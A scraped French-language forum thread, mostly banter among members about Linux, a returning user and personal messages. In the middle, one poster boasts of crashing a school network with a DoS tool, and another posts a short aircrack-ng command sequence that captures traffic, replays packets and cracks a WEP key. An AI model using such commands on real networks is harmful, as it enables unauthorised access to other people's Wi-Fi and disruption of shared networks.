Loutre
Holofractale de l'hypervérité
- Inscrit
- 28/7/09
ChapelierFou a dit:Epsil a dit:Linux, je vous dis.
Et comment tu fais tes attaques Doss avec ton nunusque hein ?
NewFag :mrgreen:
Follow along with the video below to see how to install our site as a web app on your home screen.
Note: This feature may not be available in some browsers.
ChapelierFou a dit:Epsil a dit:Linux, je vous dis.
Epsil a dit:Edit : Oh non. Je vais devoir réécouter ça maintenant. Too much oral defecation. POURQUOI POURQUOI. Dormir.
ChapelierFou a dit:@Tiax : tu vois pas que je me prostitue pour payer le vBulletin là ?
Jeune__Peyotl a dit:Il est même pu sur msn ni rien...
Tiax a dit:Boah je n'essaie même pas de rattraper le temps perdu...
D'ou k'il est "deleted"?
Opération?
bOobs?
CoOl.
J'faisais que passez, trop de taf tout ça.
Bonne route. A+
PS: Attaque DDOS?
A l'aise...
Don_Fouinardo a dit:Ett*****-**. Y'a même un GUI et tout pour script kiddie. Perso j'ai fait tomber le réseau de l'école en 10sec (ouais...) avec ça, sans le moindre besoin de connaissances. \o/ChapelierFou a dit:Epsil a dit:Linux, je vous dis.
EDIT : Censure du nom du log. N'allons quand même pas trop donner de mauvaises idées... ^^'
Mais TELLEMENT mec !ChapelierFou a dit:
Jeune__Peyotl a dit:Bé grave !
airmon-ng start wlan0
airodump-ng -w save --encrypt wep wlan0
aireplay-ng -1-60 -e (essid) -b (bssid) -h (station) wlan0
(SUCCESFULL : )
aireplay-ng -3 -x 1000 -b (bssid) -h (station) wlan0
aircrack-ng -x -0 save-01.cap
5
Key Found !!! : )
Hop une clé WEP (à peu près hin ) .
Vas-y avec windows ou DOS...
ToToro a dit:Guigz, bien content de te revoir \o/
T'as désactivé tes MP, du coup on peu plus te joindre de cette façons, et t'envoyer un mail voudrait dire que je dois au préalable rechercher ton adresse (ce qui ne serait pas très long mais bien chiant).
Je voulais t'envoyer une petite lettre de vacance y'a de ça un petit moment, vu que je pouvais plus te joindre je ne savais pas si c'était à cause d'un déménagement ou autre que tu ne trainais plus sur le net, donc si tu veux toujours la lettre (écrite mais plus d'actualité XD ), dis moi si tu est toujours à la bonne adresse et je te l'envoie :wink: